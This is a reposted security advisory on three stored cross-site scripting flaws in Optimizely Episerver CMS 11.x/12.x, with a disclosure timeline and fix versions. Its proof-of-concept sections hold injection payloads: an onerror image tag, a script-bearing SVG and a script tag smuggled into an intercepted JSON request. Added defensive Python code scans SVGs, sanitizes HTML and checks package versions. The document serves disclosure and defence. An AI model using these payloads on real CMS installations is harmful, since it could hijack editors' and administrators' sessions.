Optimizely Episerver Content Management System 11.x / 12.x Cross Site Scripting

Published: 19 Aug 2025
Reported by: Felix Beie, Kai Zimmermann
Source: packetstorm (packetstorm.news)
Views: 229

Optimizely Episerver CMS 11.x / 12.x: stored cross-site scripting (CVE-2025-27800, CVE-2025-27801, CVE-2025-27802); fixed in 11.21.4 and 12.22.1; patch available.

Related

Family   Reporter  Title                                                                                                 Published
Circl    circl     CVE-2025-27800                                                                                        28 Jul 2025 13:37
Circl    circl     CVE-2025-27801                                                                                        28 Jul 2025 13:28
Circl    circl     CVE-2025-27802                                                                                        28 Jul 2025 13:24
CNNVD    cnnvd     Optimizely Episerver Content Management System security vulnerability                                 28 Jul 2025 00:00
CNNVD    cnnvd     Optimizely Episerver Content Management System security vulnerability                                 28 Jul 2025 00:00
CNNVD    cnnvd     Optimizely Episerver Content Management System security vulnerability                                 28 Jul 2025 00:00
CVE      cve       CVE-2025-27800                                                                                        28 Jul 2025 08:33
CVE      cve       CVE-2025-27801                                                                                        28 Jul 2025 08:40
CVE      cve       CVE-2025-27802                                                                                        28 Jul 2025 08:47
Cvelist  cvelist   CVE-2025-27800 Stored Cross-Site Scripting in Episerver Content Management System (CMS) Admin Dashboard   28 Jul 2025 08:33

Confidentiality class: Internal & Partner
    
    SEC Consult Vulnerability Lab Security Advisory < publishing date 20250728-0 >
    =======================================================================
                  title: Multiple Stored Cross-Site Scripting Vulnerabilities
                product: Optimizely Episerver Content Management System (EPiServer.CMS.Core)
     vulnerable version: Version 11.X: <11.21.4
                         Version 12.X: <12.22.1
          fixed version: Version 11.X: 11.21.4
                         Version 12.X: 12.22.1
             CVE number: CVE-2025-27800, CVE-2025-27801, CVE-2025-27802
                 impact: medium
               homepage: https://www.optimizely.com
                  found: 2024-04-25
                     by: Kai Zimmermann (Office Frankfurt)
                         Felix Beie (Office Fürth)
                         SEC Consult Vulnerability Lab
    
                         An integrated part of SEC Consult, an Eviden business
                         Europe | Asia
    
                         https://www.sec-consult.com
    
    =======================================================================
    
    Vendor description:
    -------------------
    "Optimizely Content Management System equips marketers and developers with a modern,
    fully composable suite of user-friendly tools. Deliver impactful experiences across
    any channel, and personalize with AI-driven insights."
    
    Source: https://www.optimizely.com/products/content-management/
    
    
    Business recommendation:
    ------------------------
    The vendor already provides a security patch (updated packages) which should be
    installed immediately.
    
    SEC Consult highly recommends performing a thorough security review of the product,
    conducted by security professionals, to identify and resolve potential further
    security issues.
    
    
    
    Vulnerability overview/description:
    -----------------------------------
    1) Stored Cross-Site Scripting in Admin Dashboard (CVE-2025-27800)
    The Admin dashboard offered the functionality to add gadgets to the dashboard.
    This included the "Notes" gadget. An authenticated attacker with the corresponding
    access rights (such as "WebAdmin") who was impersonating the victim could insert
    malicious JavaScript code in these notes; it would be executed when the victim
    visited the dashboard.
    
    2) Stored Cross-Site Scripting in Media Selection Preview (CVE-2025-27801)
    ContentReference properties, which could be used in the "Edit" section of the CMS,
    offered an upload functionality for documents. These documents could later be used
    as displayed content on the page. It was possible to upload SVG files that include
    malicious JavaScript code that would be executed if a user visited the direct URL
    of the preview image. Attackers needed at least the role "WebEditor" in order to
    exploit this issue.
    
    3) Stored Cross-Site Scripting in Edit Preview (CVE-2025-27802)
    RTE properties (text fields), which could be used in the "Edit" section of the CMS,
    allowed the input of arbitrary text. It was possible to input malicious JavaScript
    code in these properties that would be executed if a user visited the previewed
    page. Attackers needed at least the role "WebEditor" in order to exploit this issue.
    
    
    Proof of concept:
    -----------------
    1) Stored Cross-Site Scripting in Admin Dashboard (CVE-2025-27800)
    After adding a newly created note on the dashboard, it could be edited by sending
    the following request:
    
    --------------------------------------------------------------------------------
    POST /EPiServer/CMS/Notes/Save?preferredNamespace=EPiServer.Cms.Shell.UI.Controllers.Internal&gadgetId=$GADGETID HTTP/2
    Host: $SERVER
    Cookie: sessionId=[...]; .EPiServerLogin=[...]; .ASPXROLES=[...]; __RequestVerificationToken=[...]
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 177
    
    content=Test%3cbr%3e%3cimg%20src%3dx%20onerror%3dalert(window.location)%3e&__RequestVerificationToken=[...]
    --------------------------------------------------------------------------------
    
    Visiting the dashboard again, as seen in figure 1 below, showed that the
    JavaScript code was executed:
    [01_admin_dashboard.png]
    
    
    2) Stored Cross-Site Scripting in Media Selection Preview (CVE-2025-27801)
    The following SVG file containing a JavaScript alert could be uploaded as a document
    in one of the ContentReference properties:
    
    --------------------------------------------------------------------------------
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
        <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
        <script type="text/javascript">alert(window.origin);</script>
    </svg>
    --------------------------------------------------------------------------------
    
    Visiting the preview URL, as seen in figure 2 below, showed that the JavaScript alert
    was executed:
    [02_svg_upload.png]
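    The following scanner is an added example written for this page; it is not part of
    the SEC Consult advisory or of Optimizely's code. It shows the check an upload
    handler for ContentReference documents should run before accepting an SVG: parse it
    as XML and reject active content. A copy of the proof-of-concept SVG above is
    embedded as constructed test input, and the scanner goes beyond the page by also
    catching on* event handlers, javascript:/data: URLs in href attributes and
    <foreignObject> wrappers, which the advisory does not exercise. The sample SVGs and
    all function names are assumptions of this example.

```python
"""Reject SVG uploads that carry active content.

Added example for this page, not code from the advisory or from Optimizely.
Names and the sample SVGs below are assumptions of the example.
"""
import re
import xml.etree.ElementTree as ET

# Elements that embed script or arbitrary HTML inside an SVG document.
ACTIVE_ELEMENTS = {"script", "foreignObject"}
# URL schemes that make an href execute code or smuggle a document.
DANGEROUS_SCHEMES = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.IGNORECASE)


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified names."""
    return name.rsplit("}", 1)[-1]


def find_active_content(svg_bytes: bytes) -> list[str]:
    """Return a list of findings; an empty list means no active content was found.

    Raises xml.etree.ElementTree.ParseError for input that is not well-formed XML.
    """
    findings = []
    root = ET.fromstring(svg_bytes)  # expat does not fetch the external DTD
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            local = _local(attr)
            # Every SVG attribute starting with "on" is an event handler.
            if local.lower().startswith("on"):
                findings.append(f"event handler {local} on <{tag}>")
            # href (SVG 2) and xlink:href (SVG 1.1) both have local name "href" here.
            if local == "href" and DANGEROUS_SCHEMES.match(value):
                findings.append(f"{local} with dangerous scheme on <{tag}>")
    return findings


def is_safe_svg(svg_bytes: bytes) -> bool:
    """Accept only well-formed SVGs without active content."""
    try:
        return not find_active_content(svg_bytes)
    except ET.ParseError:
        return False


# Constructed copy of the advisory's proof-of-concept SVG (one rect plus a script).
POC_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>"""

# Constructed benign upload: shapes only.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>"""

# Constructed variant with no <script> at all, which a naive tag filter would pass.
SNEAKY_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="javascript:alert(1)"><rect width="5" height="5" onclick="alert(2)"/></a>
</svg>"""

if __name__ == "__main__":
    for label, doc in ("poc", POC_SVG), ("benign", BENIGN_SVG), ("sneaky", SNEAKY_SVG):
        print(label, "safe" if is_safe_svg(doc) else find_active_content(doc))
```

    Scanning is only half of the fix: SVGs that pass should still be served from a
    separate origin or with Content-Disposition: attachment (or rasterised), so a
    browser never renders them inline in the CMS origin. The standard-library parser
    is used so the example runs offline; for untrusted uploads in production prefer a
    hardened XML parser that also limits entity expansion.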
    
    
    3) Stored Cross-Site Scripting in Edit Preview (CVE-2025-27802)
    When adding HTML elements directly in the input field, they were encoded by the
    frontend. The request, which was sent when editing the text, could be intercepted
    and modified so that the encoding was reverted. The following request was then
    sent to add a malicious JavaScript element that caused an alert when the element
    was rendered:
    
    --------------------------------------------------------------------------------
    POST /EPiServer/cms/Stores/contentdata/$ID HTTP/2
    Host: $SERVER
    Cookie: .EPiServerLogin=[...];
    Content-Length: 194
    Content-Type: application/json
    [...]
    
    {"id":"$ID","properties":{"address":"\"[...]<script>alert(window.location)</script>[...]\""},"action":$ACTIONID}
    --------------------------------------------------------------------------------
    
    After publishing the changes, the page preview could be visited by clicking on the
    respective icon on the top right of the "Edit" section. Before the preview was
    shown, the JavaScript alert was executed, as can be seen in figure 3 below:
    [03_edit_preview.png]
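    Vulnerabilities 1 and 3 share a root cause: the only encoding of note and RTE
    content happened in the browser, so a request modified in an intercepting proxy
    reached the server carrying raw HTML. The sanitizer below is an added example, not
    Optimizely's code or the vendor's fix. It shows the server-side allowlist policy
    that makes the client-side encoding irrelevant: it keeps a small set of formatting
    tags and harmless attributes, drops <script>/<style> together with their contents,
    strips on* handlers and javascript: URLs, and HTML-encodes everything else. The
    payload it is run on is constructed for this example, and the allowed tag set is an
    assumption that would follow what the editor legitimately needs.

```python
"""Server-side allowlist sanitizer for note and rich-text (RTE) content.

Added example, not Optimizely's code or the vendor's fix. The allowed tag and
attribute sets below are assumptions and would follow what the editor needs.
"""
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "ul", "ol", "li",
                "h1", "h2", "h3", "a"}
VOID_TAGS = {"br"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
# Only these URL forms may survive in href; javascript:, data: and friends are dropped.
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "/")
# These elements lose their content as well as their tags.
DROP_CONTENT_TAGS = {"script", "style"}


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document from scratch, keeping only allowlisted markup."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.dropping = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.dropping += 1
            return
        if self.dropping or tag not in ALLOWED_TAGS:
            return  # tag removed; its text content is still emitted, encoded
        kept = []
        for name, value in attrs:
            value = value or ""
            # HTMLParser lowercases attribute names, so "on" catches every handler.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.dropping = max(0, self.dropping - 1)
            return
        if self.dropping or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-encoded here, so entities the client decoded cannot re-enter as markup.
        if not self.dropping:
            self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        return "".join(self.out)


def sanitize_html(untrusted: str) -> str:
    """Sanitize content received from the editor, whatever the browser encoded."""
    parser = AllowlistSanitizer()
    parser.feed(untrusted)
    parser.close()
    return parser.result()


# Constructed payload in the spirit of the intercepted contentdata request above.
PAYLOAD = ('<p>Hello <b>world</b></p><script>alert(window.location)</script>'
           '<img src=x onerror=alert(1)><a href="javascript:alert(2)" onclick="x()">link</a>'
           '<a href="https://example.com">ok</a>')

if __name__ == "__main__":
    print(sanitize_html(PAYLOAD))
```

    Apply the policy in the request handler that stores the property (here the
    contentdata store and the Notes/Save endpoint), never only in the editor UI. This
    example shows the policy, not every HTML parsing corner case; production code
    should use a maintained sanitizer library for the platform.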
    
    
    Vulnerable / tested versions:
    -----------------------------
    The vendor confirmed that the following package versions are affected:
    * Version 11.X: EPiServer.CMS.Core (<11.21.4) with EPiServer.CMS.UI (<11.37.5)
    * Version 12.X: EPiServer.CMS.Core (<12.22.1) with EPiServer.CMS.UI (<11.37.3)
    
    
    Vendor contact timeline:
    ------------------------
    2024-05-23: Contacting vendor through [email protected]
    2024-05-24: Vendor responds to submit our vulnerabilities at Bugcrowd
    2024-05-27: Asking vendor if it is possible via email, no suitable category
                at Bugcrowd; no response.
    2024-06-04: Asking vendor where to submit the advisory for the CMS;
                Vendor confirms that Bugcrowd should not be used and requested
                advisory unencrypted via email. Submitted advisory.
    2024-06-06: Sending requested information to the vendor; Vendor responds they
                got everything they need to check the provided advisory.
    2024-06-10: Vendor provides details for all vulnerabilities. According to the
                information, most XSS are present due to intentional design
                choices;
                Asking for details regarding affected versions and a planned
                timeline to fix the vulnerabilities.
    2024-06-12: Vendor provides information that probably all versions are
                affected by the vulnerabilities, as it is a design choice;
                Stored XSS in Admin Dashboard and Media Selection Preview were only
                kept as a backlog/research item;
                There was no planned ETA for any of the 3 vulnerabilities.
    2024-06-18: Contacted vendor, explaining why the vulnerabilities should not
                be considered as "by design".
    2024-06-25: Update from vendor, that the issues were going to be flagged for
                resolution. The findings were planned to be resolved within 3
                months.
    2024-09-24: Asked for a status update.
    2024-09-24: Vendor contact checked with product team internally.
    2024-10-01: Asked for a status update.
    2024-10-08: Vendor confirmed first XSS issue fixed in CMS 12. Team was working on
                remaining two issues, planned to be resolved by mid December.
    2024-12-10: Asked for a status update.
    2025-01-06: Vendor confirmed that the instances had been remediated and provided
                the affected packages and versions. Vendor asked to postpone publication
                until a scheduled retest had been performed later that month.
    2025-02-05: Asked for a status update.
    2025-02-24: Asked for a status update.
    2025-03-07: Reserved CVE numbers, sending updated advisory to vendor, scheduled
                release for next week; Vendor was reviewing the advisory internally.
    2025-03-14: Vendor asked to postpone publication until the end of Q2. Reason given
                is that some customers were still using CMS major version 11, while the
                patches were only developed for CMS major version 12.
    2025-03-17: Asked vendor to clarify the updating process for customers.
    2025-05-21: Asked for a status update.
    2025-06-02: Vendor confirmed current timeline (end of Q2). There were different
                fixes for CMS version 11 and 12.
    2025-07-01: Asked for a status update.
    2025-07-03: Received fixed packages for CMS 11 and confirmation of packages for CMS 12.
    2025-07-28: Coordinated release of advisory.
    
    
    
    Solution:
    ---------
    The vendor provided the following updates. These versions of EPiServer.CMS.Core
    include a configuration option to filter JavaScript code. Updating the packages
    alone is not sufficient: customers are urged to install the latest version and
    enable the filter in the configuration in order to patch the security issues:
    * Version 11.X: Update EPiServer.CMS.Core to version 11.21.4 or higher
                    Update EPiServer.CMS.UI to version 11.37.5 or higher (dependency requirement)
    * Version 12.X: Update EPiServer.CMS.Core to version 12.22.1 or higher
                    Update EPiServer.CMS.UI to version 11.37.3 or higher (dependency requirement)
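    As an added example (not tooling from SEC Consult or Optimizely), the script below
    reads the PackageReference entries of an ASP.NET project file and reports whether
    the EPiServer.CMS.Core / EPiServer.CMS.UI combination is below the fixed versions
    listed above. The thresholds are taken from this advisory; the project files it is
    run on are constructed. Keep the caveat from the Solution section in mind: a passing
    version check does not show that the JavaScript filter has been enabled in the
    configuration, which the advisory says is required as well.

```python
"""Check an Episerver project's package pins against the fixed versions.

Added example, not tooling from SEC Consult or Optimizely. Thresholds come
from this advisory; the sample project files are constructed.
"""
import xml.etree.ElementTree as ET

# Fixed versions per CMS major, from the Solution section. Note that the UI
# package has its own version line (11.37.x for both CMS majors).
FIXED = {
    11: {"EPiServer.CMS.Core": (11, 21, 4), "EPiServer.CMS.UI": (11, 37, 5)},
    12: {"EPiServer.CMS.Core": (12, 22, 1), "EPiServer.CMS.UI": (11, 37, 3)},
}


def parse_version(text: str) -> tuple[int, ...]:
    """'12.22.1' -> (12, 22, 1); a prerelease suffix such as '-beta1' is ignored."""
    return tuple(int(part) for part in text.split("-", 1)[0].split("."))


def fmt(version: tuple[int, ...]) -> str:
    return ".".join(map(str, version))


def package_versions(csproj_xml: str) -> dict[str, tuple[int, ...]]:
    """Collect PackageReference Include/Version pairs from a project file."""
    root = ET.fromstring(csproj_xml)
    found = {}
    for elem in root.iter():
        # Old-style project files carry a default namespace; match the local name only.
        if elem.tag.rsplit("}", 1)[-1] != "PackageReference":
            continue
        name = elem.get("Include")
        # SDK-style projects may put the version in an attribute or a child element.
        version = elem.get("Version") or (elem.findtext("Version") or "").strip()
        if name and version:
            found[name] = parse_version(version)
    return found


def check_episerver(csproj_xml: str) -> list[str]:
    """Return the problems found; an empty list means the pins are at or above the fix."""
    pkgs = package_versions(csproj_xml)
    core = pkgs.get("EPiServer.CMS.Core")
    if core is None:
        return ["EPiServer.CMS.Core not referenced; cannot assess"]
    thresholds = FIXED.get(core[0])
    if thresholds is None:
        return [f"CMS major {core[0]} is not covered by this advisory; compare manually"]
    problems = []
    for name, fixed in thresholds.items():
        have = pkgs.get(name)
        if have is None:
            problems.append(f"{name} not referenced (needs >= {fmt(fixed)})")
        elif have < fixed:  # tuple comparison: (12, 21, 0) < (12, 22, 1)
            problems.append(f"{name} {fmt(have)} < fixed {fmt(fixed)}")
    return problems


# Constructed project files: one below the fix, one at the fixed versions.
VULNERABLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk.Web">
  <ItemGroup>
    <PackageReference Include="EPiServer.CMS.Core" Version="12.21.0" />
    <PackageReference Include="EPiServer.CMS.UI" Version="11.37.2" />
  </ItemGroup>
</Project>"""

PATCHED_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk.Web">
  <ItemGroup>
    <PackageReference Include="EPiServer.CMS.Core" Version="12.22.1" />
    <PackageReference Include="EPiServer.CMS.UI" Version="11.37.3" />
  </ItemGroup>
</Project>"""

if __name__ == "__main__":
    for label, xml in ("vulnerable", VULNERABLE_CSPROJ), ("patched", PATCHED_CSPROJ):
        print(label, check_episerver(xml) or "OK")
```

    Projects that use packages.config (common for CMS 11) or central package
    management (Directory.Packages.props with PackageVersion elements) pin versions
    elsewhere and need the lookup adapted; the comparison logic stays the same.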
    
    
    Workaround:
    -----------
    None
    
    
    Advisory URL:
    -------------
    https://sec-consult.com/vulnerability-lab/
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Eviden business
    Europe | Asia
    
    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
    Eviden business. It ensures the continued knowledge gain of SEC Consult in the
    field of network and application security to stay ahead of the attacker. The
    SEC Consult Vulnerability Lab supports high-quality penetration testing and
    the evaluation of new offensive and defensive technologies for our customers.
    Hence our customers obtain the most current information about vulnerabilities
    and valid recommendation about the risk profile of new technologies.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your application https://sec-consult.com/career/
    
    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local offices https://sec-consult.com/contact/
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Mail: security-research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: https://blog.sec-consult.com
    X: https://x.com/sec_consult
    
    EOF Kai Zimmermann, Felix Beie / 2025

Scores (as of 19 Aug 2025)
Vulners AI Score: 5.8 (medium risk)
CVSS 4.0: 4.8
CVSS 3.1: 4.8
EPSS: 0.00218
SSVC: not provided